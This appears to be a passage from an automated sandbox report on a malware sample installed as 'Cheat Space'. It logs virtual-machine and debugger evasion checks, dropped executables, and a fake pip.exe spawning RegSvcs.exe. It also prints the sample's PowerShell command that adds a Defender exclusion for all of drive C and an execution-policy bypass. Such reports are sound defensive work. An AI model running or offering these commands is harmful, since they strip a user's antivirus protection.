Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: pip.exe PID: 1136, type: MEMORYSTR

Query firmware table information (likely to detect VMs)

Source: C:\Windows\SysWOW64\msiexec.exe

System information queried: FirmwareTableInformation

Jump to behavior

Found evasive API chain (may stop execution after checking computer name)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Evasive API call chain: GetComputerName,DecisionNodes,ExitProcess

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7748	Thread sleep count: 4442 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7752	Thread sleep count: 4793 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7788	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7768	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7840	Thread sleep count: 6789 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7844	Thread sleep count: 1903 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7872	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4442	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4793	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6789	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1903	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

API coverage: 6.2 %

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7EC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI82C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI1A9A.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI80C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI89B.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI1A6A.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9C8.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI998.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI1ABA.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI84C.tmp	Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Python\pip.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API call chain: ExitProcess graph end node

Source: pip.exe, 00000016.00000000.2836043607.0000000000C2E000.00000002.00000001.01000000.00000009.sdmp, pip.exe.9.dr	Binary or memory string: hGfszCwXbZ
Source: 5d1856.msi.1.dr	Binary or memory string: RegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
Source: RegSvcs.exe, 00000018.00000002.2895356548.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.2895356548.0000000000ED5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: pip.exe.9.dr	Binary or memory string: P64VmciPn6E2ePw2glnj

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Python\pip.exe

Code function: 22_2_6CEFB6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,

22_2_6CEFB6C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0045B265 mov eax, dword ptr fs:[00000030h]	24_2_0045B265
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0044B410 mov eax, dword ptr fs:[00000030h]	24_2_0044B410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0045158B mov eax, dword ptr fs:[00000030h]	24_2_0045158B

Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe

Code function: 10_2_00007FF677E88C9C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

10_2_00007FF677E88C9C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 24_2_00446880 GetObjectW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetDC,GetDIBits,ReleaseDC,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

24_2_00446880

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Roaming\Python\pip.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E5D6E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FF677E5D6E8
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E88C9C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FF677E88C9C
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BDD6E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_2_00007FF720BDD6E8
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720C08C9C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_00007FF720C08C9C
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF4948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	22_2_6CF4948B
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF4B144 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_6CF4B144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0044C240 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	24_2_0044C240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00459409 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_00459409
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0044BD45 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_0044BD45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0044BD39 SetUnhandledExceptionFilter,	24_2_0044BD39

HIPS / PFW / Operating System Protection Evasion

Executes Lua script

Source: unknown	Process created: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe" "C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe" "C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua
Source: unknown	Process created: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe" "C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua
Source: unknown	Process created: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe" "C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe" "C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua	Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -ExclusionPath C: -Force }
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -ExclusionPath C: -Force }			Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\msiexec.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss1BB4.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi1BA1.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr1BA2.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr1BA3.txt" -propSep " :<->: " -testPrefix "_testValue."

Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pss1bb4.ps1" -propfile "c:\users\user\appdata\local\temp\msi1ba1.txt" -scriptfile "c:\users\user\appdata\local\temp\scr1ba2.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scr1ba3.txt" -propsep " :<->: " -testprefix "_testvalue."
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pss1bb4.ps1" -propfile "c:\users\user\appdata\local\temp\msi1ba1.txt" -scriptfile "c:\users\user\appdata\local\temp\scr1ba2.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scr1ba3.txt" -propsep " :<->: " -testprefix "_testvalue."			Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe" "C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss1BB4.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi1BA1.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr1BA2.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr1BA3.txt" -propSep " :<->: " -testPrefix "_testValue."	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -ExclusionPath C: -Force }	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior

Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: EnumSystemLocalesW,	10_2_00007FF677E9A7F8
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: EnumSystemLocalesW,	10_2_00007FF677E9A728
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: EnumSystemLocalesW,	10_2_00007FF677E89698
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	10_2_00007FF677E9A3DC
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	10_2_00007FF677E9AE10
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: try_get_function,GetLocaleInfoW,	10_2_00007FF677E89CD0
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	10_2_00007FF677E9AC34
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	18_2_00007FF720C1A3DC
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: EnumSystemLocalesW,	18_2_00007FF720C09698
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: EnumSystemLocalesW,	18_2_00007FF720C1A7F8
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: EnumSystemLocalesW,	18_2_00007FF720C1A728
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: try_get_function,GetLocaleInfoW,	18_2_00007FF720C09CD0
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	18_2_00007FF720C1AC34
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	18_2_00007FF720C1AE10

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
